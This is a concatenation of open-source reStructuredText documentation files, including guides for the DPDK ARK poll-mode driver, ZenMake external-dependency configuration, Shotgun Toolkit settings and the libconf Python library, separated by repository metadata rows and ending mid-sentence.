Create a custom authentication based on querystring parameter
-------------------------------------------------------------
It is not recommended to pass server in a querystring, because
get parameter are oftenly logged by server, and secret should never
be logged. So blacksmith does not provide a middleware to handle this
query, but, you can still implementing it by yourself.
See how to implement it in the section :ref:`Generic Middleware`.
| 31.061538 | 79 | 0.729569 |
a7c2590b4b5006604639d7d81b32fc10863b5378 | 10,168 | rst | reStructuredText | libmoon/deps/dpdk/doc/guides/nics/ark.rst | anonReview/Implementation | b86e0c48a1a9183a143687a2875b160504bcb202 | [
"MIT"
] | 4 | 2016-07-31T16:24:45.000Z | 2021-11-22T16:10:39.000Z | libmoon/deps/dpdk/doc/guides/nics/ark.rst | anonReview/Implementation | b86e0c48a1a9183a143687a2875b160504bcb202 | [
"MIT"
] | null | null | null | libmoon/deps/dpdk/doc/guides/nics/ark.rst | anonReview/Implementation | b86e0c48a1a9183a143687a2875b160504bcb202 | [
"MIT"
] | 2 | 2021-06-16T11:30:50.000Z | 2021-09-20T16:53:38.000Z | .. BSD LICENSE
Copyright (c) 2015-2017 Atomic Rules LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Atomic Rules LLC nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
ARK Poll Mode Driver
====================
The ARK PMD is a DPDK poll-mode driver for the Atomic Rules Arkville
(ARK) family of devices.
More information can be found at the `Atomic Rules website
<http://atomicrules.com>`_.
Overview
--------
The Atomic Rules Arkville product is DPDK and AXI compliant product
that marshals packets across a PCIe conduit between host DPDK mbufs and
FPGA AXI streams.
The ARK PMD, and the spirit of the overall Arkville product,
has been to take the DPDK API/ABI as a fixed specification;
then implement much of the business logic in FPGA RTL circuits.
The approach of *working backwards* from the DPDK API/ABI and having
the GPP host software *dictate*, while the FPGA hardware *copes*,
results in significant performance gains over a naive implementation.
While this document describes the ARK PMD software, it is helpful to
understand what the FPGA hardware is and is not. The Arkville RTL
component provides a single PCIe Physical Function (PF) supporting
some number of RX/Ingress and TX/Egress Queues. The ARK PMD controls
the Arkville core through a dedicated opaque Core BAR (CBAR).
To allow users full freedom for their own FPGA application IP,
an independent FPGA Application BAR (ABAR) is provided.
One popular way to imagine Arkville's FPGA hardware aspect is as the
FPGA PCIe-facing side of a so-called Smart NIC. The Arkville core does
not contain any MACs, and is link-speed independent, as well as
agnostic to the number of physical ports the application chooses to
use. The ARK driver exposes the familiar PMD interface to allow packet
movement to and from mbufs across multiple queues.
However FPGA RTL applications could contain a universe of added
functionality that an Arkville RTL core does not provide or can
not anticipate. To allow for this expectation of user-defined
innovation, the ARK PMD provides a dynamic mechanism of adding
capabilities without having to modify the ARK PMD.
The ARK PMD is intended to support all instances of the Arkville
RTL Core, regardless of configuration, FPGA vendor, or target
board. While specific capabilities such as number of physical
hardware queue-pairs are negotiated; the driver is designed to
remain constant over a broad and extendable feature set.
Intentionally, Arkville by itself DOES NOT provide common NIC
capabilities such as offload or receive-side scaling (RSS).
These capabilities would be viewed as a gate-level "tax" on
Green-box FPGA applications that do not require such function.
Instead, they can be added as needed with essentially no
overhead to the FPGA Application.
The ARK PMD also supports optional user extensions, through dynamic linking.
The ARK PMD user extensions are a feature of Arkville’s DPDK
net/ark poll mode driver, allowing users to add their
own code to extend the net/ark functionality without
having to make source code changes to the driver. One motivation for
this capability is that while DPDK provides a rich set of functions
to interact with NIC-like capabilities (e.g. MAC addresses and statistics),
the Arkville RTL IP does not include a MAC. Users can supply their
own MAC or custom FPGA applications, which may require control from
the PMD. The user extension is the means providing the control
between the user's FPGA application and the existing DPDK features via
the PMD.
Device Parameters
-------------------
The ARK PMD supports device parameters that are used for packet
routing and for internal packet generation and packet checking. This
section describes the supported parameters. These features are
primarily used for diagnostics, testing, and performance verification
under the guidance of an Arkville specialist. The nominal use of
Arkville does not require any configuration using these parameters.
"Pkt_dir"
The Packet Director controls connectivity between Arkville's internal
hardware components. The features of the Pkt_dir are only used for
diagnostics and testing; it is not intended for nominal use. The full
set of features are not published at this level.
Format:
Pkt_dir=0x00110F10
"Pkt_gen"
The packet generator parameter takes a file as its argument. The file
contains configuration parameters used internally for regression
testing and are not intended to be published at this level. The
packet generator is an internal Arkville hardware component.
Format:
Pkt_gen=./config/pg.conf
"Pkt_chkr"
The packet checker parameter takes a file as its argument. The file
contains configuration parameters used internally for regression
testing and are not intended to be published at this level. The
packet checker is an internal Arkville hardware component.
Format:
Pkt_chkr=./config/pc.conf
Data Path Interface
-------------------
Ingress RX and Egress TX operation is by the nominal DPDK API .
The driver supports single-port, multi-queue for both RX and TX.
Refer to ``ark_ethdev.h`` for the list of supported methods to
act upon RX and TX Queues.
Configuration Information
-------------------------
**DPDK Configuration Parameters**
The following configuration options are available for the ARK PMD:
* **CONFIG_RTE_LIBRTE_ARK_PMD** (default y): Enables or disables inclusion
of the ARK PMD driver in the DPDK compilation.
* **CONFIG_RTE_LIBRTE_ARK_PAD_TX** (default y): When enabled TX
packets are padded to 60 bytes to support downstream MACS.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_RX** (default n): Enables or disables debug
logging and internal checking of RX ingress logic within the ARK PMD driver.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_TX** (default n): Enables or disables debug
logging and internal checking of TX egress logic within the ARK PMD driver.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_STATS** (default n): Enables or disables debug
logging of detailed packet and performance statistics gathered in
the PMD and FPGA.
* **CONFIG_RTE_LIBRTE_ARK_DEBUG_TRACE** (default n): Enables or disables debug
logging of detailed PMD events and status.
Building DPDK
-------------
See the :ref:`DPDK Getting Started Guide for Linux <linux_gsg>` for
instructions on how to build DPDK.
By default the ARK PMD library will be built into the DPDK library.
For configuring and using UIO and VFIO frameworks, please also refer :ref:`the
documentation that comes with DPDK suite <linux_gsg>`.
Supported ARK RTL PCIe Instances
--------------------------------
ARK PMD supports the following Arkville RTL PCIe instances including:
* ``1d6c:100d`` - AR-ARKA-FX0 [Arkville 32B DPDK Data Mover]
* ``1d6c:100e`` - AR-ARKA-FX1 [Arkville 64B DPDK Data Mover]
Supported Operating Systems
---------------------------
Any Linux distribution fulfilling the conditions described in ``System Requirements``
section of :ref:`the DPDK documentation <linux_gsg>` or refer to *DPDK
Release Notes*. ARM and PowerPC architectures are not supported at this time.
Supported Features
------------------
* Dynamic ARK PMD extensions
* Multiple receive and transmit queues
* Jumbo frames up to 9K
* Hardware Statistics
Unsupported Features
--------------------
Features that may be part of, or become part of, the Arkville RTL IP that are
not currently supported or exposed by the ARK PMD include:
* PCIe SR-IOV Virtual Functions (VFs)
* Arkville's Packet Generator Control and Status
* Arkville's Packet Director Control and Status
* Arkville's Packet Checker Control and Status
* Arkville's Timebase Management
Pre-Requisites
--------------
#. Prepare the system as recommended by DPDK suite. This includes environment
variables, hugepages configuration, tool-chains and configuration
#. Insert igb_uio kernel module using the command 'modprobe igb_uio'
#. Bind the intended ARK device to igb_uio module
At this point the system should be ready to run DPDK applications. Once the
application runs to completion, the ARK PMD can be detached from igb_uio if necessary.
Usage Example
-------------
Follow instructions available in the document
:ref:`compiling and testing a PMD for a NIC <pmd_build_and_test>` to launch
**testpmd** with Atomic Rules ARK devices managed by librte_pmd_ark.
Example output:
.. code-block:: console
[...]
EAL: PCI device 0000:01:00.0 on NUMA socket -1
EAL: probe driver: 1d6c:100e rte_ark_pmd
EAL: PCI memory mapped at 0x7f9b6c400000
PMD: eth_ark_dev_init(): Initializing 0:2:0.1
ARKP PMD CommitID: 378f3a67
Configuring Port 0 (socket 0)
Port 0: DC:3C:F6:00:00:01
Checking link statuses...
Port 0 Link Up - speed 100000 Mbps - full-duplex
Done
testpmd>
| 38.80916 | 86 | 0.767506 |
820a9f68342a9932d66456ed93f4a2afc71ad85a | 132 | rst | reStructuredText | docs/api/epd_utils_lib/usecase_config.rst | quasi-robotics/easy_perception_deployment | 19f0df36aa94426f81576a0b605718a7d8ac2d12 | [
"Apache-2.0"
] | 40 | 2020-07-10T02:40:09.000Z | 2022-03-28T13:09:00.000Z | docs/api/epd_utils_lib/usecase_config.rst | quasi-robotics/easy_perception_deployment | 19f0df36aa94426f81576a0b605718a7d8ac2d12 | [
"Apache-2.0"
] | 19 | 2020-09-15T14:50:09.000Z | 2022-03-14T12:36:57.000Z | docs/api/epd_utils_lib/usecase_config.rst | cardboardcode/easy_perception_deployment | bf3ba2247fdddd1c6197762a5be453efd7031e02 | [
"Apache-2.0"
] | 8 | 2020-06-29T04:26:57.000Z | 2022-01-07T13:57:26.000Z | .. _api_usecase_config:
usecase_config
==============
.. doxygenfile:: usecase_config.hpp
:project: easy_perception_deployment
| 16.5 | 39 | 0.712121 |
79ce45e259bfc099c00bb58169ce9a331b9f5157 | 1,754 | rst | reStructuredText | Memcached/MCBug5/memcached-127/libmemcached-0.49/docs/index.rst | uditagarwal97/nekara-artifact | b210ccaf751aca6bae7189d4f4db537b6158c525 | [
"MIT"
] | 2 | 2021-07-15T15:58:18.000Z | 2021-07-16T14:37:26.000Z | Memcached/MCBug5/memcached-127/libmemcached-0.49/docs/index.rst | uditagarwal97/nekara-artifact | b210ccaf751aca6bae7189d4f4db537b6158c525 | [
"MIT"
] | null | null | null | Memcached/MCBug5/memcached-127/libmemcached-0.49/docs/index.rst | uditagarwal97/nekara-artifact | b210ccaf751aca6bae7189d4f4db537b6158c525 | [
"MIT"
] | 2 | 2021-07-15T12:19:06.000Z | 2021-09-06T04:28:19.000Z | =========================================
Welcome to the libmemcached documentation
=========================================
------------
Libmemcached
------------
######
Basics
######
.. toctree::
:maxdepth: 1
libmemcached
memcached_create
libmemcached_examples
libmemcached_configuration
#################
Working with data
#################
.. toctree::
:maxdepth: 1
memcached_auto
memcached_delete
memcached_flush_buffers
memcached_flush
memcached_get
memcached_result_st
memcached_set
###############
Advanced Topics
###############
.. toctree::
:maxdepth: 1
memcached_behavior
memcached_callback
memcached_dump
memcached_generate_hash_value
memcached_memory_allocators
memcached_quit
memcached_sasl
memcached_server_st
memcached_servers
memcached_strerror
memcached_user_data
memcached_verbosity
memcached_version
#################
Platform Specific
#################
.. toctree::
:maxdepth: 1
tap
#################################
Deriving statistics from a server
#################################
.. toctree::
:maxdepth: 1
memcached_analyze
memcached_stats
----------------
Libmemcachedutil
----------------
.. toctree::
:maxdepth: 1
libmemcachedutil
memcached_pool
-------------------
Client Applications
-------------------
.. toctree::
:maxdepth: 1
memcapable
memcat
memcp
memdump
memerror
memflush
memrm
memslap
memaslap
memstat
----------
Libhashkit
----------
.. toctree::
:maxdepth: 1
libhashkit
hashkit_create
hashkit_functions
hashkit_value
==================
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
| 13.703125 | 41 | 0.552452 |
76bb84eab3e426b2ff97f0b6d44068916c315cde | 9,750 | rst | reStructuredText | docs/buildconf-edeps.rst | sturmianseq/zenmake | 44f1131c1ab677d8c3c930150c63a7dde4ef7de0 | [
"BSD-3-Clause"
] | null | null | null | docs/buildconf-edeps.rst | sturmianseq/zenmake | 44f1131c1ab677d8c3c930150c63a7dde4ef7de0 | [
"BSD-3-Clause"
] | null | null | null | docs/buildconf-edeps.rst | sturmianseq/zenmake | 44f1131c1ab677d8c3c930150c63a7dde4ef7de0 | [
"BSD-3-Clause"
] | null | null | null | .. include:: global.rst.inc
.. highlight:: python
.. _buildconf-edep-params:
Build config: edeps
=============================
The config parameter ``edeps`` is a :ref:`dict<buildconf-dict-def>` with
configurations of external non-system dependencies.
General description of external dependencies is :ref:`here<dependencies-external>`.
Each such a dependency can have own unique name and parameters:
.. _buildconf-edep-params-rootdir:
rootdir
"""""""""""""""""""""
A path to the root of the dependency project. It should be path to directory
with the build script of the dependency project.
This path can be relative to the :ref:`startdir<buildconf-startdir>` or absolute.
targets
"""""""""""""""""""""
A :ref:`dict<buildconf-dict-def>` with descriptions of targets of the
dependency project. Each target has a reference name which can be in
:ref:`use<buildconf-taskparams-use>` in format
``dependency-name:target-reference-name`` and parameters:
:dir:
A path with the current target file. Usually it's some build directory.
This path can be relative to the :ref:`startdir<buildconf-startdir>` or absolute.
:type:
It's type of the target file. This type has effects to the link of
the build tasks and some other things. Supported types:
:stlib:
The target file is a static library.
:shlib:
The target file is a shared library.
:program:
The target file is an executable file.
:file:
The target file is any file.
:name:
It is a base name of the target file which is used
for detecting of resulting target file name depending on destination
operation system, selected toolchain, value of ``type``, etc.
If it's not set the target reference name is used.
:ver-num:
It's a version number for the target file if it is a shared library.
It can have effect on resulting target file name.
:fname:
It's a real file name of the target. Usually it's detected by ZenMake
from other parameters but you can set it manually but it's not
recommended until you really need it.
If parameter ``type`` is equal to ``file`` the value of this parameter
is always equal to value of parameter ``name`` by default.
Example in YAML format for non-ZenMake dependency:
.. code-block:: yaml
targets:
# 'shared-lib' and 'static-lib' are target reference names
shared-lib:
dir : ../foo-lib/_build_/debug
type: shlib
name: fooutil
static-lib:
dir : ../foo-lib/_build_/debug
type: stlib
name: fooutil
Example in Python format for non-ZenMake dependency:
.. code-block:: python
'targets': {
# 'shared-lib' and 'static-lib' are target reference names
'shared-lib' : {
'dir' : '../foo-lib/_build_/debug',
'type': 'shlib',
'name': 'fooutil',
},
'static-lib' : {
'dir' : '../foo-lib/_build_/debug',
'type': 'stlib',
'name': 'fooutil',
},
},
.. _buildconf-edep-params-export-includes:
export-includes
"""""""""""""""""""""
A list of paths with 'includes' for C/C++/D/Fortran compilers to export from
the dependency project for all build tasks which depend on the current dependency.
Paths should be relative to the :ref:`startdir<buildconf-startdir>` or
absolute but last variant is not recommended.
If paths contain spaces and all these paths are listed
in one string then each such a path must be in quotes.
rules
"""""""""""""""""""""
A :ref:`dict<buildconf-dict-def>` with descriptions of rules to produce
targets files of dependency. Each rule has own reserved name and
parameters to run. The rule names that allowed to use are:
``configure``, ``build``, ``test``, ``clean``, ``install``, ``uninstall``.
The parameters for each rule can a string with a command line to run or
a dict with attributes:
:cmd:
A command line to run. It can be any suitable command line.
:cwd:
A working directory where to run ``cmd``. By default it's
the :ref:`rootdir<buildconf-edep-params-rootdir>`.
This path can be relative to the :ref:`startdir<buildconf-startdir>` or absolute.
:env:
Environment variables for ``cmd``. It's a ``dict`` where each
key is a name of variable and value is a value of env variable.
:timeout:
A timeout for ``cmd`` in seconds. By default there is no timeout.
:shell:
If shell is True, the specified command will be executed through
the shell. By default it is False.
In some cases it can be set to True by ZenMake even though you
set it to False.
:trigger:
A dict that describes conditions to run the rule.
If any configured trigger returns True then the rule will be run.
You can configure one or more triggers for each rule.
ZenMake supports the following types of trigger:
:always:
If it's True then the rule will be run always. If it's False and
no other triggers then the rule will not be run automatically.
:paths-exist:
This trigger returns True only if configured paths exist on
a file system. You can set paths as a string, list of strings or as
a dict like for config task parameter
:ref:`source<buildconf-taskparams-source>`.
Examples in YAML format:
.. code-block:: yaml
trigger:
paths-exist: /etc/fstab
trigger:
paths-exist: [ /etc/fstab, /tmp/somefile ]
trigger:
paths-exist:
startdir: '../foo-lib'
incl: '**/*.label'
Examples in Python format:
.. code-block:: python
'trigger': {
'paths-exist' : '/etc/fstab',
}
'trigger': {
'paths-exist' : ['/etc/fstab', '/tmp/somefile'],
}
'trigger': {
'paths-exist' : dict(
startdir = ../foo-lib,
incl = '**/*.label',
),
}
:paths-dont-exist:
This trigger is the same as ``paths-exist`` but returns True if
configured paths don't exist.
:env:
This trigger returns True only if all configured environment variables
exist and equal to configured values. Format is simple:
it's a ``dict`` where each key is a name of variable and value
is a value of environment variable.
:no-targets:
If it is True this trigger returns True only if any of target files
for current dependency doesn't exist. It can be useful to detect
the need to run 'build' rule.
This trigger can not be used in ZenMake command 'configure'.
:func:
This trigger is a custom python function that must return True or False.
This function gets the following parameters as arguments:
:zmcmd:
It's a name of the current ZenMake command that has been used
to run the rule.
:targets:
A list of configured/detected targets. It's can be None if rule
has been run from command 'configure'.
It's better to use `**kwargs` in this function because some new
parameters can be added in the future.
This trigger can not be used in YAML buildconf file.
.. note::
For any non-ZenMake dependency there are following
default triggers for rules:
configure: { always: true }
build: { no-targets: true }
Any other rule: { always: false }
.. note::
You can use command line option ``-E``/``--force-edeps`` to run
rules for external dependencies without checking triggers.
:zm-commands:
A list with names of ZenMake commands in which selected rule will be run.
By default each rule can be run in the ZenMake command with the same name only.
For example, rule 'configure' by default can be run with the command
'configure' and rule 'build' with the command 'build', etc.
But here you can set up a different behavior.
.. _buildconf-edep-params-buildtypes-map:
buildtypes-map
"""""""""""""""""""""
This parameter is used only for external dependencies which are other
ZenMake projects. By default ZenMake uses value of current ``buildtype``
for all such dependencies to run rules but in some cases names of buildtype
can be not matched. For example, current project can have buildtypes
``debug`` and ``release`` but project from dependency can have
buildtypes ``dbg`` and ``rls``. In this case
you can use this parameter to set up the map of these buildtype names.
Example in YAML format:
.. code-block:: yaml
buildtypes-map:
debug : dbg
release : rls
Example in Python format:
.. code-block:: python
buildtypes-map: {
'debug' : 'dbg',
'release' : 'rls',
}
Some examples can be found in the directory 'external-deps'
in the repository `here <repo_demo_projects_>`_.
| 34.821429 | 89 | 0.595282 |
b7ddd032eb49ee07e08d9997dc29fd7fe78329df | 99 | rst | reStructuredText | docs/source/api/constants/constants/vunits.constants.m_e.rst | VlachosGroup/vunits | 0d0261bff1e57708eb885b65119f3b741b47ee03 | [
"MIT"
] | null | null | null | docs/source/api/constants/constants/vunits.constants.m_e.rst | VlachosGroup/vunits | 0d0261bff1e57708eb885b65119f3b741b47ee03 | [
"MIT"
] | 3 | 2020-01-06T03:03:51.000Z | 2020-06-29T17:29:50.000Z | docs/source/api/constants/constants/vunits.constants.m_e.rst | VlachosGroup/vunits | 0d0261bff1e57708eb885b65119f3b741b47ee03 | [
"MIT"
] | null | null | null | vunits.constants.m\_e
=====================
.. currentmodule:: vunits.constants
.. autodata:: m_e | 16.5 | 35 | 0.575758 |
500a5418b4ff478c68f40684ab01326aacc9651a | 455 | rst | reStructuredText | README.rst | naumvd95/salt-formula-patroni | 1aec5db1da617bbf0da65171a531e7e947b444d8 | [
"Apache-2.0"
] | null | null | null | README.rst | naumvd95/salt-formula-patroni | 1aec5db1da617bbf0da65171a531e7e947b444d8 | [
"Apache-2.0"
] | null | null | null | README.rst | naumvd95/salt-formula-patroni | 1aec5db1da617bbf0da65171a531e7e947b444d8 | [
"Apache-2.0"
] | null | null | null | Salt formula for patroni
based on ansible role - https://github.com/imcitius/ansible-pgsql_patroni_cluster
full guide for psql cluster: https://habrahabr.ru/post/322036/
**Its not finished yet**
TODO:
* haproxy,keepalived,postgres dependencies metadata
* haproxy,keepalived,postgres jinja templating , defining vars
* haproxy,keepalived,postgres dependencies check if installed
* client/server state redefine
**Feel free to advice**
| 19.782609 | 81 | 0.769231 |
a1f3bd5e42530e66b66c1b3885c6248e529ccbe0 | 141 | rst | reStructuredText | docs/activitystreams.models.rst | nowells/django-activitystreams | 4f07667c5927c5d6d50a6bb5142ff2b5d3b5c105 | [
"MIT"
] | 1 | 2018-01-19T04:59:57.000Z | 2018-01-19T04:59:57.000Z | docs/activitystreams.models.rst | nowells/django-activitystreams | 4f07667c5927c5d6d50a6bb5142ff2b5d3b5c105 | [
"MIT"
] | null | null | null | docs/activitystreams.models.rst | nowells/django-activitystreams | 4f07667c5927c5d6d50a6bb5142ff2b5d3b5c105 | [
"MIT"
] | null | null | null | activitystreams.models
======================
.. currentmodule:: activitystreams.models
.. automodule:: activitystreams.models
:members: | 20.142857 | 41 | 0.659574 |
5b09bcf5231a7d9903b1ba968657577e2c4f25a4 | 77 | rst | reStructuredText | clients/python/README.rst | liuyu81/datagator-contrib | 813529e211f680732bd1dc9568f5b4f2bdcacdcc | [
"Apache-2.0"
] | 2 | 2015-02-20T02:50:07.000Z | 2017-05-02T19:26:42.000Z | clients/python/README.rst | liuyu81/datagator-contrib | 813529e211f680732bd1dc9568f5b4f2bdcacdcc | [
"Apache-2.0"
] | null | null | null | clients/python/README.rst | liuyu81/datagator-contrib | 813529e211f680732bd1dc9568f5b4f2bdcacdcc | [
"Apache-2.0"
] | null | null | null | HTTP Client Library for ``DataGator``
=====================================
| 19.25 | 37 | 0.376623 |
9a61515ddfec50d811998bfa569728f60f79ae22 | 37 | rst | reStructuredText | doc/sphinx/hardware/mitsubishi.rst | ZLW07/RobWork | e713881f809d866b9a0749eeb15f6763e64044b3 | [
"Apache-2.0"
] | 1 | 2021-12-29T14:16:27.000Z | 2021-12-29T14:16:27.000Z | doc/sphinx/hardware/mitsubishi.rst | ZLW07/RobWork | e713881f809d866b9a0749eeb15f6763e64044b3 | [
"Apache-2.0"
] | null | null | null | doc/sphinx/hardware/mitsubishi.rst | ZLW07/RobWork | e713881f809d866b9a0749eeb15f6763e64044b3 | [
"Apache-2.0"
] | null | null | null | Mitsubishi PA-10
===================
| 12.333333 | 19 | 0.378378 |
1a65e93f623a735cd92e18ff0b376e680e9113e2 | 476 | rst | reStructuredText | CHANGELOG.rst | leggedrobotics/robot_markers | 21acef776ed39591e52f4498072b59d3e66bd15e | [
"BSD-3-Clause"
] | 9 | 2017-09-21T09:21:30.000Z | 2022-03-19T18:22:54.000Z | CHANGELOG.rst | leggedrobotics/robot_markers | 21acef776ed39591e52f4498072b59d3e66bd15e | [
"BSD-3-Clause"
] | 6 | 2017-08-17T07:04:13.000Z | 2021-07-14T17:01:04.000Z | CHANGELOG.rst | leggedrobotics/robot_markers | 21acef776ed39591e52f4498072b59d3e66bd15e | [
"BSD-3-Clause"
] | 4 | 2019-03-20T20:41:10.000Z | 2020-08-25T09:04:33.000Z | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package robot_markers
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
0.2.1 (2018-06-01)
------------------
* Fixed builder when building the whole robot.
* Contributors: Justin Huang
0.2.0 (2018-01-31)
------------------
* Added ability to filter markers to a set of links.
* Added website.
* Update README.md
* Contributors: Justin Huang
0.1.0 (2017-05-25)
------------------
* Initial package creation.
* Contributors: Justin Huang
| 22.666667 | 52 | 0.544118 |
e6acd14b7e480996959c94a3d2f0d2fe3bf2a820 | 3,442 | rst | reStructuredText | install/app_store/tk-framework-shotgunutils/v4.4.15/docs/settings.rst | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | null | null | null | install/app_store/tk-framework-shotgunutils/v4.4.15/docs/settings.rst | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | null | null | null | install/app_store/tk-framework-shotgunutils/v4.4.15/docs/settings.rst | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | 1 | 2020-02-15T10:42:56.000Z | 2020-02-15T10:42:56.000Z | Shotgun Toolkit QT Settings Wrapper
######################################
The settings module makes it easy to store things like user preferences, app related state etc.
For example, if you want your app to remember the state of a checkbox across sessions, you can
use the settings module to store this value. Adding persisting settings to an app can quickly
drastically improve the user experience at a very low cost.
This settings module wraps around `QSettings`. This means that the settings data will be stored
on your local machine and that they are for the current user only. If you need to share a preference
or setting between multiple users, this module is most likely *not* the right one to use.
Settings can have different scope. This indicates how the setting should be shared between
instances of apps, shotgun setups etc. Please note that the setting is still per-user and per-machine,
so if it is scoped to be "global", it means that it will be shared across all different apps, engines,
configurations, projects and shotgun sites for the current user on their local machine.
- ``SCOPE_GLOBAL`` - No restriction.
- ``SCOPE_SITE`` - Settings are per Shotgun site.
- ``SCOPE_PROJECT`` - Settings are per Shotgun project.
- ``SCOPE_CONFIG`` - Settings are per Shotgun Pipeline Configuration.
- ``SCOPE_INSTANCE`` - Settings are per app or engine instance. For example, if your app
contains a set of filters, and you want these to be remembered across sessions, you would
typically use this scope. Each instance of the app will remember its own filters, so when you
run it in the asset environment, one set of filters are remembered, when you run it in the shot
environment, another set of filters etc.
- ``SCOPE_ENGINE`` - One setting per engine. This makes it possible to store one set of preferences
for apps running in Photoshop, Maya, Nuke etc. This makes it possible to for example store a setting
that remembers if a "welcome screen" for your app has been displayed - so that it is only displayed
once in Maya, once in Nuke etc.
The following code illustrates typical use of the settings module::
# example of how the settings module can be used within your app code
# import the module - note that this is using the special
# import_framework code so it won't work outside an app
settings = sgtk.platform.import_framework("tk-framework-shotgunutils", "settings")
# typically in the constructor of your main dialog or in the app, create a settings object:
self._settings_manager = settings.UserSettings(sgtk.platform.current_bundle())
# the settings system will handle serialization and management of data types
# so you can pass simple types such as strings, ints and lists and dicts of these.
#
# retrieve a settings value and default to a value if no settings was found
scale_val = self._settings_manager.retrieve("thumb_size_scale", 140)
# or store the same value
self._settings_manager.store("thumb_size_scale", 140)
# by default, things are scoped with `SCOPE_GLOBAL`.
# If you want to specify another scope, add a scope parameter.
# Fetch a preference with a specific scope
ui_launched = self._settings_manager.retrieve("ui_launched", False, self._settings_manager.SCOPE_ENGINE)
# And store a preference with a specific scope
self._settings_manager.store("ui_launched", True, self._settings_manager.SCOPE_ENGINE)
| 57.366667 | 108 | 0.759733 |
e802912bfcff71398f087785249b25a452ab3c5e | 46 | rst | reStructuredText | Misc/NEWS.d/next/Build/2022-01-08-12-43-31.bpo-45925.38F3NO.rst | pepr/cpython | c52518f2d2aee382870d44ac3ca178cebae4f59b | [
"0BSD"
] | 2 | 2017-06-29T15:59:56.000Z | 2017-12-01T20:10:18.000Z | Misc/NEWS.d/next/Build/2022-01-08-12-43-31.bpo-45925.38F3NO.rst | pepr/cpython | c52518f2d2aee382870d44ac3ca178cebae4f59b | [
"0BSD"
] | 3 | 2022-01-11T15:34:07.000Z | 2022-03-01T14:04:45.000Z | Misc/NEWS.d/next/Build/2022-01-08-12-43-31.bpo-45925.38F3NO.rst | pepr/cpython | c52518f2d2aee382870d44ac3ca178cebae4f59b | [
"0BSD"
] | 3 | 2017-10-18T09:35:14.000Z | 2018-09-09T16:40:13.000Z | Update Windows installer to use SQLite 3.37.2. | 46 | 46 | 0.804348 |
ae099363d508a4ff1b6db0d4e9ad01bb831ad07c | 6,598 | rst | reStructuredText | README.rst | jaywalker9999/python-libconf | 7bfebc0f816756d9ce9c853d0143ccac48880ba1 | [
"MIT"
] | 23 | 2016-12-01T11:22:48.000Z | 2021-07-13T12:06:56.000Z | README.rst | jaywalker9999/python-libconf | 7bfebc0f816756d9ce9c853d0143ccac48880ba1 | [
"MIT"
] | 20 | 2016-09-09T10:05:14.000Z | 2021-05-14T13:37:05.000Z | README.rst | jaywalker9999/python-libconf | 7bfebc0f816756d9ce9c853d0143ccac48880ba1 | [
"MIT"
] | 13 | 2016-09-09T10:05:54.000Z | 2020-12-09T10:50:53.000Z | =======
libconf
=======
libconf is a pure-Python reader/writer for configuration files in `libconfig
format`_, which is often used in C/C++ projects. It's interface is similar to
the `json`_ module: the four main methods are ``load()``, ``loads()``,
``dump()``, and ``dumps()``.
Example usage::
import io, libconf
>>> with io.open('example.cfg') as f:
... config = libconf.load(f)
>>> config
{'capabilities': {'can-do-arrays': [3, 'yes', True],
'can-do-lists': (True,
14880,
('sublist',),
{'subgroup': 'ok'})},
'version': 7,
'window': {'position': {'h': 600, 'w': 800, 'x': 375, 'y': 210},
'title': 'libconfig example'}}
>>> config['window']['title']
'libconfig example'
>>> config.window.title
'libconfig example'
>>> print(libconf.dumps({'size': [10, 15], 'flag': True}))
flag = True;
size =
[
10,
15
];
The data can be accessed either via indexing (``['title']``) or via attribute
access ``.title``.
Character encoding and escape sequences
---------------------------------------
The recommended way to use libconf is with Unicode objects (``unicode`` on
Python2, ``str`` on Python3). Input strings or streams for ``load()`` and
``loads()`` should be Unicode, as should be all strings contained in data
structures passed to ``dump()`` and ``dumps()``.
In ``load()`` and ``loads()``, escape sequences (such as ``\n``, ``\r``,
``\t``, or ``\xNN``) are decoded. Hex escapes (``\xNN``) are mapped to Unicode
characters U+0000 through U+00FF. All other characters are passed though as-is.
In ``dump()`` and ``dumps()``, unprintable characters below U+0080 are escaped
as ``\n``, ``\r``, ``\t``, ``\f``, or ``\xNN`` sequences. Characters U+0080
and above are passed through as-is.
Writing libconfig files
-----------------------
Reading libconfig files is easy. Writing is made harder by two factors:
* libconfig's distinction between `int and int64`_: ``2`` vs. ``2L``
* libconfig's distinction between `lists`_ and `arrays`_, and
the limitations on arrays
The first point concerns writing Python ``int`` values. Libconf dumps values
that fit within the C/C++ 32bit ``int`` range without an "L" suffix. For larger
values, an "L" suffix is automatically added. To force the addition of an "L"
